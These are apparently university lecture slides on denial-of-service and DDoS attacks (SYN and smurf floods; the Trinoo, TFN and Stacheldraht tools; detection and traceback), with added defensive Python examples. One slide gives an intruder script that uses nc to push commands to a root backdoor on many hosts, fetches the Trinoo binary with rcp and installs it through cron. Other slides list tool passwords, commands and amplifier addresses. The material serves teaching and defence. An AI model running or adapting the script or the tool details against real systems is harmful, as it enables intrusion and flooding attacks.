Number of slides: 60
Denial of Service
CS 155, Spring Quarter
David Brumley, dbrumley@stanford.edu
Overview
• Overview / history of DoS
• Traditional DoS
• DDoS
• Tracking DoS
• Preventative measures
• Conclusion
Who are we talking about?
• Government (NSA)
• R&D labs / universities
• Computer professionals
• Exploit writers
• Script kiddies
Example: GRC.COM
Example: GRC.COM (quoted messages)
"hi, its me, wicked, im the one nailing the server with udp and icmp packets, nice sisco router, btw im 13, its a new addition, nothin tracert cant handle, and ur on a t3... so up ur connection foo, we will just keep comin at you, u cant stop us "script kiddies" because we are better than you, plain and simple."
---------
"Yo, u might not thing of this as anyomous, but its not real info, it's a stolen earthlink, so its good, now, to speak of the implemented attacks, yeah its me, and the reason me and my 2 other contributers do this is because in a previous post you call us "script kiddies", at least so I was told...."
Classic DoS
• Fork / malloc() bomb
• Flooding: June 1996, first advisory on UDP flooding
• Theme: exploit a finite queue or an exposed, unoptimized interface
• Fix 1: limit the interface
• Fix 2: optimize the interface
Example: SYN Flooding
[diagram: (1) SYN, (2) SYN/ACK between hosts A and B; the receiver of the SYN holds half-open state until the final ACK, which a flooder never sends]
• Fix 1: minimal state cache at A
• Fix 2: SYN cookies
Overall: fixing this is non-trivial programming
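How a SYN-cookie server avoids keeping half-open state, as an added example (not code from the slides or from any real TCP stack): the server folds a keyed MAC over the connection 4-tuple and a coarse clock into its own initial sequence number, stores nothing, and when the third handshake packet arrives it recomputes the MAC to decide whether the handshake is genuine. The bit layout (24-bit MAC, 5-bit time slot, 3-bit MSS index), the window of four slots, the MSS table and the constant names are this example's own choices; Linux packs its cookie differently.

```python
"""Stateless SYN cookies: the server keeps no half-open connection state;
the third handshake packet must echo a value only a genuine peer at that
source address could have received.  Simplified layout (this example's
own, not the Linux packing):
    server_isn = client_isn + cookie
    cookie     = mac24 << 8 | (time_slot & 0x1F) << 3 | mss_index
"""
import hashlib
import hmac
import struct
from ipaddress import IPv4Address

MSS_TABLE = (536, 1300, 1440, 1460)   # MSS is quantised to an index so it fits in 3 bits
SLOT_SECONDS = 64                     # granularity of the cookie clock
COOKIE_WINDOW = 4                     # accept cookies minted in the last 4 slots (about 4 min)
SECRET = b"constructed demo secret; rotate it in a real stack"
MASK32 = 0xFFFFFFFF


def _mac24(saddr, daddr, sport, dport, slot):
    """24-bit keyed MAC over the connection 4-tuple and the time slot."""
    msg = struct.pack("!4s4sHHI", IPv4Address(saddr).packed, IPv4Address(daddr).packed,
                      sport, dport, slot)
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_server_isn(saddr, daddr, sport, dport, client_isn, client_mss, now):
    """On SYN: choose the SYN|ACK sequence number so that it *is* the cookie.
    Nothing about this connection is stored."""
    slot = int(now) // SLOT_SECONDS
    mss_idx = max((i for i, m in enumerate(MSS_TABLE) if m <= client_mss), default=0)
    cookie = (_mac24(saddr, daddr, sport, dport, slot) << 8) | ((slot & 0x1F) << 3) | mss_idx
    return (client_isn + cookie) & MASK32


def check_ack(saddr, daddr, sport, dport, seq, ack, now):
    """On the final ACK: return the MSS to use if the acknowledged ISN is a
    cookie we minted for this 4-tuple within COOKIE_WINDOW slots, else None."""
    client_isn = (seq - 1) & MASK32       # the ACK carries seq = client_isn + 1
    server_isn = (ack - 1) & MASK32       # and ack = server_isn + 1
    cookie = (server_isn - client_isn) & MASK32
    mss_idx, slot_bits, mac_bits = cookie & 0x7, (cookie >> 3) & 0x1F, cookie >> 8
    if mss_idx >= len(MSS_TABLE):
        return None
    now_slot = int(now) // SLOT_SECONDS
    for slot in range(max(0, now_slot - COOKIE_WINDOW + 1), now_slot + 1):
        if slot & 0x1F != slot_bits:
            continue                      # the low bits only name the slot ...
        if _mac24(saddr, daddr, sport, dport, slot) == mac_bits:
            return MSS_TABLE[mss_idx]     # ... the MAC is what proves it
    return None


if __name__ == "__main__":
    # Constructed handshake: client 10.0.0.7:40000 -> server 171.64.15.86:80
    c = ("10.0.0.7", "171.64.15.86", 40000, 80)
    isn = make_server_isn(*c, client_isn=0x12345678, client_mss=1452, now=1000)
    print("SYN|ACK seq", hex(isn))
    print("valid ACK ->", check_ack(*c, seq=0x12345679, ack=(isn + 1) & MASK32, now=1100))
    print("stale ACK ->", check_ack(*c, seq=0x12345679, ack=(isn + 1) & MASK32, now=1000 + 4 * 64))
```

The trade-offs are visible in the code: the 24-bit MAC bounds how hard a blind forgery is, the cookie encodes only a quantised MSS (other SYN options are lost unless carried elsewhere, which is why stacks only fall back to cookies under pressure), and a captured valid ACK can be replayed for as long as the slot window stays open.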
Most Prevalent Attacks
• Jolt / jolt2: IP fragment reassembly (UDP and TCP)
• Stream / raped: flood with ACKs
• Trash: IGMP flooding
• Mixed UDP/TCP/ICMP flooding
• Starting to target routers instead of hosts
Distributed Attack: Smurf
[diagram: tens to hundreds of hosts replying to one victim]
The attacker sends ICMP echo requests to a network's broadcast address with the victim's address forged as the source; every host on that segment answers the victim, so each request is multiplied by the number of hosts that respond.
Amplification Networks
• Netscan.org (broadcast address, replies drawn by one echo request, country):
  210.95.3.128    427  (Korea)
  203.252.30.0    401  (Korea)
  203.252.30.255  390  (Korea)
  210.95.3.255    300  (Korea)
  130.87.223.255  174  (Japan)
  206.101.110.127      (US)
• Average amplification: 4
Ping Attack
PING 206.101.110.127: 56 data bytes
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
....
64 bytes from 206.101.110.1: seq=13 ttl=21 time=127 ms.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=171 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=175 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=181 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=185 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=216 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=220 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=222 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=229 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=230 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=241 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=243 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=248 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=254 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=259 ms, duplicate.
....
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1513 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1518 ms, duplicate.
....
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1571 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1572 ms, duplicate.
....
packet seq=13 bounced at radio-adventures-corp.Washington.cw.net (208.173.12.42): Time to live exceeded
packet seq=13 bounced at radio-adventures-corp.Washington.cw.net (208.173.12.42): Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
packet seq=13 bounced at bar6-loopback.Washington.cw.net (206.24.226.11): Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
64 bytes from 206.101.110.1: seq=13 ttl=21 time=6917 ms, duplicate.
packet seq=13 bounced at bar6-loopback.Washington.cw.net (206.24.226.11): Time to live exceeded
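Turning that ping transcript into the numbers netscan.org ranked networks by, as an added example (not part of the slides): a parser for the three line shapes above that counts replies per probe (the amplification factor), records who answered, and flags probes whose replies both arrive and die of TTL elsewhere, which is what the 6917 ms duplicate beside the "Time to live exceeded" notices suggests. SAMPLE is trimmed from the slide's own output; the looping heuristic is this example's, not a claim the slides make.

```python
"""Read broadcast-ping output the way netscan.org ranked amplifiers: how many
replies one echo request drew (the amplification factor), who answered, and
whether TTL-exceeded bounces point at replies looping in the network.
Added example; SAMPLE is trimmed from the slide's ping output."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

REPLY = re.compile(r"^\d+ bytes from (\S+): seq=(\d+) ttl=\d+ time=(\d+) ms(, duplicate)?\.?$")
BOUNCE = re.compile(r"^packet seq=(\d+) bounced at ([^\s:(]+)(?: \(([^)]+)\))?: .+$")
TIMEOUT = re.compile(r"^no reply from \S+ within \d+ sec$")

SAMPLE = """\
PING 206.101.110.127: 56 data bytes
no reply from 206.101.110.127 within 1 sec
64 bytes from 206.101.110.1: seq=13 ttl=21 time=127 ms.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=171 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=175 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1513 ms, duplicate.
packet seq=13 bounced at radio-adventures-corp.Washington.cw.net (208.173.12.42): Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
64 bytes from 206.101.110.1: seq=13 ttl=21 time=6917 ms, duplicate.
""".splitlines()


@dataclass
class Probe:
    replies: int = 0                 # every reply counts, the first one included
    duplicates: int = 0              # replies after the first for the same seq
    responders: set = field(default_factory=set)
    bounces: int = 0                 # "Time to live exceeded" notices for this seq
    bounce_hops: set = field(default_factory=set)
    max_rtt_ms: int = 0


def parse_ping(lines):
    """Group the output by probe (seq); return ({seq: Probe}, timeouts)."""
    probes, timeouts = defaultdict(Probe), 0
    for line in lines:
        line = line.strip()
        if m := REPLY.match(line):
            pr = probes[int(m.group(2))]
            pr.replies += 1
            pr.duplicates += 1 if m.group(4) else 0
            pr.responders.add(m.group(1))
            pr.max_rtt_ms = max(pr.max_rtt_ms, int(m.group(3)))
        elif m := BOUNCE.match(line):
            pr = probes[int(m.group(1))]
            pr.bounces += 1
            pr.bounce_hops.add(m.group(3) or m.group(2))   # prefer the IP, fall back to the name
        elif TIMEOUT.match(line):
            timeouts += 1
    return dict(probes), timeouts


def amplification(probes):
    """Replies per probe, over probes that drew at least one reply."""
    answered = [p.replies for p in probes.values() if p.replies]
    return sum(answered) / len(answered) if answered else 0.0


def looping(probe):
    """Heuristic: the same probe is both answered and expires of TTL elsewhere,
    so copies of the reply are still circulating."""
    return probe.replies > 0 and probe.bounces > 0


if __name__ == "__main__":
    probes, timeouts = parse_ping(SAMPLE)
    print(f"timeouts={timeouts} amplification={amplification(probes):.1f}")
    for seq, pr in sorted(probes.items()):
        print(seq, pr.replies, sorted(pr.responders), pr.bounces, "loop?" if looping(pr) else "")
```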
Bad guy's point of view
• What to do if smurf no longer works?
  – Admins could disable directed broadcast
  – Admins could filter traffic coming from broadcast networks
Distributed DoS
[diagram: Client → Handlers/Masters → Agents/Daemons]
Building DDoS Networks
• Launch exploit
• Log in through back door
• Install daemon
• Install "rootkit" to hide daemon
• Repeat
Result of Exploit
Normal system:
sunset:security> telnet elaine
Trying 171.64.15.86...
Connected to elaine21.stanford.edu.
Escape character is '^]'.
UNIX(r) System V Release 4.0 (elaine21.Stanford.EDU)
elaine21.Stanford.EDU login:

Hacked system (the back door on port 1524 hands out a root shell with no login):
sunset:security> telnet jimi-hendrix 1524
Trying 171.65.38.180...
Connected to jimi-hendrix.Stanford.EDU (171.65.38.180).
Escape character is '^]'.
# ls -altr /;
total 1618
-r-xr-xr-x   1 root  sys   1541 Oct 14  1998 .cshrc
drwx------   2 root        8192 Apr 14  1999 lost+found
drwxr-xr-x   1 root           9 Apr 14  1999 bin
drwxrwxr-x   2 root         512 Apr 14  1999 mnt
Example Intruder Script
• Automated exploit:
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
• trin.sh:
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo * * * /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
RCP
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8111]: root@poot.Stanford.EDU as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8112]: root@crash-bandit.Stanford.EDU as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8113]: root@galena.Stanford.EDU as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8117]: root@gradegrinder.Stanford.EDU as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8124]: root@galena.Stanford.EDU as demos: cmd='rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8127]: root@poot.Stanford.EDU as demos: cmd='rcp -f neet.tar'
....
Over 200 hosts compromised!
DDoS Networks
• Trinoo: June/July 1999
• TFN: August/September 1999
• Stacheldraht: September/October 1999
• IRC botnet: more recent
Trinoo Overview
• Communication
  – Attacker to master(s): 27665/tcp
  – Master to daemon(s): 27444/udp
  – Daemon to master(s): 31335/udp
• List of masters hard-coded into the clients
• UDP flooder
Trinoo Master
• Daemon list Blowfish-encrypted
• crypt() password required for startup
# ./master
??
wrongpassword
#
...
# ./master
??
gOrave
trinoo v1.07d2+f3+c
Trinoo Master Commands
• die
• mtimer: set DoS timer
• dos IP
• mdie: password required
• mping: send "PING" command, should get a "PONG"
• mdos
• info: print version information
• msize: set DoS packet size
• killdead: solicits "*HELLO*" from clients, else removes the entry
• bcast: list hosts
• mstop: attempt to stop DoS. Not implemented :)
Analysis of Handler
# strings - master
...
---v
v1.07d2+f3+c
trinoo %s
l44adsl                 <- cleartext daemon password
sock
0nm1VNMX…               <- crypt(gOrave)
local master
10:09:24 Sep 26 1999
trinoo %s [%s:%s]
bind
read
*HELLO*
ZsoTN.cq4X31            <- Blowfish crypt key
bored
NEW Bcast - %s
PONG %d Received from %s
Warning: Connection from %s
beUBZbLtK7kkY           <- crypt(betalmostdone)
trinoo %s..[rpm8d/cb4Sx/]..
DoS: usage: dos
DoS: Packeting %s.
aaa %s %s
mdie
ErDVt6azHrePE           <- crypt(killme) for mdie: Disabling Bcasts.
d1e %s
mdie: password?
Daemon Forensics
• Starting the daemon sends "*HELLO*" to the master
• Commands are of the form "arg1 password arg2":
  – aaa pass IP: DoS IP on random UDP ports
  – bbb pass N: sets time limits
  – png pass: send a "PONG" to the master on port 31335/udp
  – d1e pass:
  – ...
• Note that UNIX strings by default only displays runs of 4 or more ASCII characters!
# strings --bytes=3 ns | tail -15
socket
bind
recvfrom
l44
%s %s %s
aIf3YWfOhw.V.
aaa
bbb
shi
png
PONG
d1e
rsz
xyz
*HELLO*
Trinoo LSOF
# lsof | egrep ":31335|:27665"
master  1292 root  3u  inet  2460  UDP *:31335
master  1292 root  4u  inet  2461  TCP *:27665 (LISTEN)
# lsof -p 1292
COMMAND  PID  USER FD   TYPE DEVICE SIZE    NODE  NAME
master   1292 root cwd  DIR  3,1    1024    14356 /tmp/...
master   1292 root rtd  DIR  3,1    1024    2     /
master   1292 root txt  REG  3,1    30492   14357 /tmp/.../master
master   1292 root mem  REG  3,1    342206  28976 /lib/ld-2.1.1.so
master   1292 root mem  REG  3,1    63878   29116 /lib/libcrypt-2.1.1.so
master   1292 root mem  REG  3,1    4016683 29115 /lib/libc-2.1.1.so
master   1292 root 0u   CHR  4,1            2967  /dev/tty1
master   1292 root 1u   CHR  4,1            2967  /dev/tty1
master   1292 root 2u   CHR  4,1            2967  /dev/tty1
master   1292 root 3u   inet 2534                 UDP *:31335
master   1292 root 4u   inet 2535                 TCP *:27665 (LISTEN)
Trinoo Forensics
• Master IP addresses visible
• Enough strings to recognize daemon/master easily
• Listening TCP/UDP ports can be seen with "lsof"
• Attacker session not encrypted
Tribal Flood Network
• Communication:
  – Client to handler: none
  – Handler <-> agent: ICMP Echo Reply
• DoS types
  – SYN
  – UDP
  – ICMP
  – with spoofing capabilities
TFN Handler
--------------------------------
[tribe flood network] (c) 1999 by Mixter
usage: ./tfn <iplist> <type> [ip] [port]
<iplist>  contains a list of numerical hosts that are ready to flood
<type>    -1 for spoofmask type (specify 0-3), -2 for packet size,
          is 0 for stop/status, 1 for udp, 2 for syn, 3 for icmp,
          4 to bind a rootshell (specify port)
          5 to smurf, first ip is target, further ips are broadcasts
[ip]      target ip[s], separated by @ if more than one
[port]    must be given for a syn flood, 0 = RANDOM
--------------------------------
TFN Commands
#define ID_ACK     123 /* for replies to the client */
#define ID_SHELL   456 /* to bind a rootshell, optional */
#define ID_PSIZE   789 /* to change size of udp/icmp packets */
#define ID_SWITCH  234 /* to switch spoofing mode */
#define ID_STOPIT  567 /* to stop flooding */
#define ID_SENDUDP 890 /* to udp flood */
#define ID_SENDSYN 345 /* to syn flood */
#define ID_SYNPORT 678 /* to set port */
#define ID_ICMP    901 /* to icmp flood */
#define ID_SMURF   666 /* haps! */
Identifying an Agent
td 5931 root cwd DIR  3,5 1024   240721 /usr/libx/...
td 5931 root rtd DIR  3,1 1024   2      /
td 5931 root txt REG  3,5 297508 240734 /usr/libx/.../td
td 5931 root 3u  sock 0,0        92814  can't identify protocol
(the last line is the agent's raw socket, which lsof cannot name by protocol)
Network Example
# ./tfn iplist 4 12345
[tribe flood network] (c) 1999 by Mixter
# tcpdump -lnx -s 1518 icmp
tcpdump: listening on eth0
05:51:32.706829 10.0.0.1 > 192.168.0.1: icmp: echo reply
  0000 64d1 01c8 0000 3132 3334 3500                         <- id 0x01c8 = 456 (ID_SHELL); "12345" in the data portion
05:51:32.741556 192.168.0.1 > 10.0.0.1: icmp: echo reply
  0000 6cae 007b 0000 7368 656c 6c20 626f 756e 6420 746f
  2070 6f72 7420 3132 3334 350a 00                           <- id 0x007b = 123 (ID_ACK); data "shell bound to port 12345"
Forensics
• Easy to spot in lsof (+)
• ICMP easy to disguise (-)
• ICMP ECHO_REPLY often allowed through firewalls (-)
• Attacker's session not encrypted
Stacheldraht
• Communication:
  – Client <-> handler: 16660/tcp
  – Handler <-> agent: 65000/tcp, ICMP_ECHOREPLY
  – Doesn't use the agent TCP channel for anything in the versions I've seen
• Client/handler traffic Blowfish-encrypted
• UDP/TCP/ICMP flooding with spoofing
Stacheldraht Client and Handler
• Client to handler Blowfish-encrypted with password "authentication"
• Handler password "sicken", encrypted with crypt()
• More proactive at identifying live/dead hosts: similar to a distributed network
• Handler limited to 1000 agents
Handler Strings
starting trinoo emulation...
removing useful commands. - DONE
available commands in this version are:
--------------------------
.mtimer .mudp .micmp .msyn .msort .mping .madd .mlist .msadd .msrem .distro .help .setusize .setisize .mdie .sprange .mstop .killall .showdead .showalive
usage: .distro
Stacheldraht Agent
• Interesting addition: upgrade feature via rcp
• Attempts a spoofed packet to the handler to test whether spoofing is possible
• Handlers compiled in, or kept in a Blowfish-encrypted file (default password "randomsucks")
• On start sends ID value 666 with data "skillz" to the handler; the handler responds with 667 and data "ficken"
DoS BotNets
• Scan for vulnerable hosts
• Infect
• Join an IRC channel and wait for further commands
• Generally used for warez distribution as well
• Example: Kaiten
Fighting DDoS: Identify Agents
• Strings of the master in the daemon
• Finding the master is important!
• Dump and log as much as possible
Identifying DDoS Agents
• Counter-espionage / intrusion
  – Identify the intruder's signature
  – Look for that signature
• RID
RID Examples
start Agent.Stacheldraht
    send icmp type=0 id=668 data=""
    recv icmp type=0 id=669 data="sicken" nmatch=2
end Agent.Stacheldraht

start Agent.Stacheldraht4
    send icmp type=0 id=6268 data=""
    recv icmp type=0 id=669 data="sicken" nmatch=2
end Agent.Stacheldraht4
More RID Examples
start Agent.TFN
    send icmp type=0 id=789
    recv icmp type=0 id=123 nmatch=2
end Agent.TFN

start Agent.Trinoo
    send udp dport=27444 data="png l44adsl"
    recv udp data="PONG" nmatch=1
end Agent.Trinoo
RID @ Stanford
• start telnetd
      send tcp dport=7000 data="rn"
      recv tcp data="Ataman Telnetd" nmatch=1
  end telnetd
• ./rid -t 20 -b 255 -n 2 171.64.0.0/16
  **** 171.64.250.82 infected with telnetd
  **** 171.64.245.132 infected with telnetd
  **** 171.64.245.76 infected with telnetd
  **** 171.64.245.22 infected with telnetd
  **** 171.64.241.116 infected with telnetd
  ...
• 156 total!
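The two TFN packets from the "Network Example" slide and the RID stanzas above, decoded and matched offline, as an added example (not code from the slides, from tfn or from RID): an ICMP parser that checks the checksum and reads the identifier as a TFN command, a reader for the start/send/recv/end signature format, and a matcher that applies the recv side of each signature to a decoded packet. The command IDs, the hex and the stanzas are copied from the slides; reading nmatch as "at least this many of the listed recv fields must agree" is my assumption about RID's semantics, and the matcher only handles the icmp signatures (the udp Trinoo probe needs a live exchange).

```python
"""Decode ICMP echo-reply control traffic of the TFN kind and test it against
RID-style signatures.  Added example, not code from the slides, tfn or RID.
The command IDs, the tcpdump hex and the signature stanzas are copied from the
slides; reading nmatch as "at least this many recv fields must agree" is my
assumption about RID's semantics."""
import shlex
import struct
from dataclasses import dataclass, field

# ICMP identifier values tfn uses as commands (the #defines on the "TFN Commands" slide)
TFN_IDS = {123: "ID_ACK", 456: "ID_SHELL", 789: "ID_PSIZE", 234: "ID_SWITCH", 567: "ID_STOPIT",
           890: "ID_SENDUDP", 345: "ID_SENDSYN", 678: "ID_SYNPORT", 901: "ID_ICMP", 666: "ID_SMURF"}

# ICMP portion of the two packets on the "Network Example" slide
TFN_CAPTURE = [
    "0000 64d1 01c8 0000 3132 3334 3500",                                                  # handler -> agent
    "0000 6cae 007b 0000 7368 656c 6c20 626f 756e 6420 746f 2070 6f72 7420 3132 3334 350a 00",  # agent -> handler
]

RID_RULES = """
start Agent.Stacheldraht
    send icmp type=0 id=668 data=""
    recv icmp type=0 id=669 data="sicken" nmatch=2
end Agent.Stacheldraht
start Agent.TFN
    send icmp type=0 id=789
    recv icmp type=0 id=123 nmatch=2
end Agent.TFN
start Agent.Trinoo
    send udp dport=27444 data="png l44adsl"
    recv udp data="PONG" nmatch=1
end Agent.Trinoo
"""


def icmp_checksum(data):
    """RFC 1071 one's-complement sum of 16-bit words, odd tail zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def decode_icmp(hexdump):
    """Parse one ICMP message; for tfn the id field is the command."""
    raw = bytes.fromhex(hexdump.replace(" ", ""))
    typ, code, csum, ident, seq = struct.unpack("!BBHHH", raw[:8])
    return {"type": typ, "code": code, "id": ident, "seq": seq,
            "data": raw[8:].split(b"\x00", 1)[0].decode("latin-1"),  # tfn NUL-terminates payloads
            "checksum_ok": icmp_checksum(raw[:2] + b"\x00\x00" + raw[4:]) == csum,
            "tfn_command": TFN_IDS.get(ident)}


@dataclass
class Signature:
    name: str
    proto: str = ""
    send: dict = field(default_factory=dict)
    recv: dict = field(default_factory=dict)
    nmatch: int = 1


def parse_rid(text):
    """Read start/send/recv/end stanzas into Signature objects."""
    sigs, cur = [], None
    for line in text.splitlines():
        words = shlex.split(line)            # also strips the quotes around data="..."
        if not words:
            continue
        if words[0] == "start":
            cur = Signature(name=words[1])
        elif words[0] in ("send", "recv"):
            cur.proto = words[1]
            kv = dict(w.split("=", 1) for w in words[2:])
            fields = {k: int(v) if v.isdigit() else v for k, v in kv.items()}
            cur.nmatch = fields.pop("nmatch", cur.nmatch)
            getattr(cur, words[0]).update(fields)
        elif words[0] == "end":
            sigs.append(cur)
    return sigs


def matches(sig, pkt):
    """Hit when at least nmatch of the recv fields agree with the decoded packet."""
    if sig.proto != "icmp":
        return False
    hits = sum(1 for k, v in sig.recv.items() if str(pkt.get(k)) == str(v))
    return hits >= sig.nmatch


def classify(pkt, sigs):
    """Names of every signature the packet satisfies."""
    return [s.name for s in sigs if matches(s, pkt)]


if __name__ == "__main__":
    sigs = parse_rid(RID_RULES)
    for hexdump in TFN_CAPTURE:
        pkt = decode_icmp(hexdump)
        print(pkt["tfn_command"], repr(pkt["data"]),
              "checksum ok" if pkt["checksum_ok"] else "checksum BAD", classify(pkt, sigs))
```

Both checksums on the slide verify, so the hex was captured intact; the agent's reply (id 123, "shell bound to port 12345") is what the Agent.TFN signature's recv side is looking for, while the handler's ID_SHELL command matches no signature because RID keys on the agent's answer.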
General DDoS Observations
• Intruders mix encryption mechanisms
• No architecture in the security design
• Easily recognizable via strings
Defending against DoS
• Resisting DoS
  – Filtering
  – Traffic shaping
  – Pure filtering
    • Ingress = incoming: drop packets arriving on an interface with a source address that could not legitimately come from there
    • Egress = outgoing: drop packets leaving your network whose source is not your own address space, so your hosts cannot be used for spoofed floods
• Locating attacker(s)
  – Logging
  – Automatic traceback
  – Packet tagging
Logging
• Audit utilities:
  – tcpdump
  – Argus
  – Cisco NetFlow
• Problem: huge data sets
• Asta.com: NetFlow monitor
Input Logging
1. Log on to the nearest router
2. Enable input debugging on the router
3. Find the upstream router
4. Recurse
[diagram: victim v, attacker a]
Controlled Flooding
• Cheswick & Burch
• Idea: follow the slowest routers
• Problems: obvious
[diagram: Attacker, R3, R1, R2, Victim]
Node Sampling (Savage et al.), Method 1
• Use the IP fragment ID field
• Each router overwrites the field with its own address with probability p
• Issues:
  – requires p > 0.5, so that the sample count strictly decreases with distance and the routers can be ordered by it
  – Long time to infer the path (-)
  – Multiple attackers at the same distance (-)
[diagram: Attacker → R4 → R3 → R1 → Victim, with R2, R5, R6 as other routers; a router d hops upstream of the last one survives in the victim's samples with probability p(1-p)^d: p for the nearest router, p(1-p) for the next, p(1-p)^2 for the one after]
Method 2: Edge Sampling
• Add 3 fields:
  – 2 IP addresses forming the edge (start, end)
  – a distance field
• Issues:
  – space requirements (-)
  – p can be arbitrary (+)
  – complexity (-)
[diagram: Attacker → R3 → R2 → R6 → Victim; edges are marked as (src, dst): (A, R3), (R3, R2), (R2, R6)]
Savage's Compression Method
• Step 1: router a decides, with probability p, to start an edge: it writes a into the edge field and sets d = 0
• Step 2a: the next hop b notices d = 0, writes a xor b, and increments d
• Step 2b: every later hop notices d != 0 and only increments d
[diagram: A → R3 → R2 → R1 → V; the victim receives R1 at d = 0, R2 xor R1 at d = 1 and R3 xor R2 at d = 2, and unwinds them nearest first: get R1's address, then R2 = (R2 xor R1) xor R1, then R3 = (R3 xor R2) xor R2]
Issues with Savage
• Spreads edge identification across multiple packets (+)
• Combinatorial complexity during edge identification (-) (fixed by the Dean, Franklin, Stubblefield algorithm)
• Reuses the IP fragment field (-)
• Does not work on existing hardware (IRL) (-)
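The marking and unwinding of the compression method, run end to end, as an added example (not code from Savage et al. or from the slides): routers apply steps 1, 2a and 2b to every packet, the victim groups what arrives by distance and XORs out one hop at a time. The router addresses, p, the packet counts and the random-forgery attacker are constructed for the example; the 5-bit saturating distance field is my reading of the scheme, chosen so that the attacker can never make a forged mark look closer than the real path.

```python
"""Probabilistic packet marking (Savage et al.) with the XOR edge compression
from the slide, simulated end to end: routers mark packets in transit, the
victim unwinds the marks into the path.  Added example, not code from the
paper; the router addresses, p and packet counts are constructed."""
import random
from dataclasses import dataclass
from ipaddress import IPv4Address

DIST_MAX = 31        # 5-bit distance field; saturating, so it can never wrap back to 0

# R1 is the router next to the victim, R3 the one next to the attacker
ROUTERS = tuple(int(IPv4Address(a)) for a in ("10.0.3.1", "10.0.2.1", "10.0.1.1"))


@dataclass
class Packet:
    edge: int        # one router address (d == 0) or the XOR of both ends of an edge
    distance: int    # hops travelled since 'edge' was started


def mark(pkt, router, p, rng):
    """Marking procedure run by every router (the slide's steps 1, 2a, 2b)."""
    if rng.random() < p:
        pkt.edge, pkt.distance = router, 0                 # 1: start an edge here
    else:
        if pkt.distance == 0:
            pkt.edge ^= router                             # 2a: close the edge from one hop upstream
        pkt.distance = min(pkt.distance + 1, DIST_MAX)     # 2b: just count the hop


def send(path, p, n, rng, forge=None):
    """Push n packets along path (router nearest the attacker first); return the
    arrivals.  forge(rng) -> (edge, distance) is how the attacker pre-loads the
    marking fields; by default they are zero."""
    arrivals = []
    for _ in range(n):
        pkt = Packet(*(forge(rng) if forge else (0, 0)))
        for router in path:
            mark(pkt, router, p, rng)
        arrivals.append(pkt)
    return arrivals


def reconstruct(arrivals):
    """Victim side.  All samples at distance d carry R_d xor R_(d-1) (R_0 alone
    at d == 0), so XOR-ing out the previous hop yields the next one.  Stop at
    the first distance whose samples disagree: every router increments
    'distance', so anything the attacker wrote can only surface at
    d >= path length, and random forgeries show up there as contradiction
    rather than as a believable hop."""
    by_dist = {}
    for pkt in arrivals:
        by_dist.setdefault(pkt.distance, set()).add(pkt.edge)
    path, prev = [], 0
    for d in range(DIST_MAX + 1):
        samples = by_dist.get(d, set())
        if len(samples) != 1:
            break
        prev ^= samples.pop()
        path.append(prev)
    return path


def simulate(seed, forge=False, p=0.2, n=3000):
    """Attacker -> R3 -> R2 -> R1 -> victim; return the addresses the victim
    recovers, nearest router first.  With forge=True the attacker fills the
    fields with random data on every packet."""
    rng = random.Random(seed)
    pre = (lambda r: (r.getrandbits(32), 0)) if forge else None
    return reconstruct(send(list(reversed(ROUTERS)), p, n, rng, pre))


if __name__ == "__main__":
    for forge in (False, True):
        got = simulate(seed=1, forge=forge)
        print("forged fields" if forge else "zeroed fields", "->",
              [str(IPv4Address(a)) for a in got])
```

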